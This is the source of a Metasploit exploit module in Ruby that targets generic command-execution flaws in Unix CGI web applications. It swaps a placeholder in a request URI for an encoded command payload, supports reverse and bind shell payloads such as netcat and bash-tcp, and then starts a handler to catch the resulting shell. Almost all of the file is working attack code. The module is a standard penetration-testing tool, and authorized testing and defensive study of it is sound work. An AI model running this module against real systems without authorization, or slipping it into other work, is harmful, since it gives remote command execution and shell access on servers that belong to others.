
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/generic_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
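class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  # Placeholder that the operator puts into CMDURI where the command belongs;
  # exploit() replaces every occurrence with the encoded payload.
  CMD_TOKEN = 'XXcmdXX'

  # Registers module metadata and the single CMDURI option.
  #
  # @param info [Hash] metadata merged into this module's definition by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Generic Web Application Unix Command Execution',
      'Description' => %q{
        This module can be used to exploit any generic command execution vulnerability
        for CGI applications on Unix-like platforms. To use this module, specify the
        CMDURI path, replacing the command itself with XXcmdXX. This module is currently
        limited to forms vulnerable through GET requests with query parameters.
      },
      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' => [ ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          # Upper bound on the encoded payload length; the whole command has to
          # fit into one query-string value.
          'Space' => 1024,
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl telnet netcat netcat-e bash-tcp',
            }
        },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [[ 'Automatic', { }]],
      'DisclosureDate' => '1993-11-14', # CGI historical date :)
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('CMDURI', [true, "The full URI path with the XXcmdXX parameter", "/cgi-bin/generic?cmd=XXcmdXX"]),
      ])
  end

  # Sends one GET request whose query string carries the payload in place of
  # CMD_TOKEN, then starts the payload handler.
  #
  # The command travels in the request URI, so from the defender's side it is
  # typically recorded verbatim in the web server's access log and is visible
  # to any proxy or WAF that inspects query parameters.
  #
  # @return [void]
  def exploit
    # Only the query string is rewritten; a CMDURI with no '?' is sent as-is
    # (and then carries no payload).
    uri = datastore['CMDURI'].to_s
    path, query = uri.split('?', 2)

    uri = "#{path}?#{rewrite_query(query)}" if query

    print_status("Sending HTTP request for #{uri}")
    # 30-second response timeout; a nil result means no response arrived.
    res = send_request_cgi({
      'global' => true,
      'uri' => uri
    }, 30)

    if res
      print_status("The server responded with HTTP CODE #{res.code}")
    else
      print_status("The server did not respond to our request")
    end

    handler
  end

  private

  # Rebuilds a query string with the payload substituted for CMD_TOKEN.
  #
  # Each name and value is URI-encoded separately so the payload cannot break
  # the parameter structure. A parameter without '=' (e.g. "?cmd") or an empty
  # parameter ("a&&b") yields an empty value/name instead of raising
  # NoMethodError on nil, which the previous `v.gsub` did.
  #
  # @param query [String] the part of CMDURI after '?'
  # @return [String] the rewritten, '&'-joined query string
  def rewrite_query(query)
    query.split('&').map do |pair|
      name, value = pair.split('=', 2)
      encoded_value = Rex::Text.uri_encode(value.to_s.gsub(CMD_TOKEN, payload.encoded))
      "#{Rex::Text.uri_encode(name.to_s)}=#{encoded_value}"
    end.join('&')
  end
end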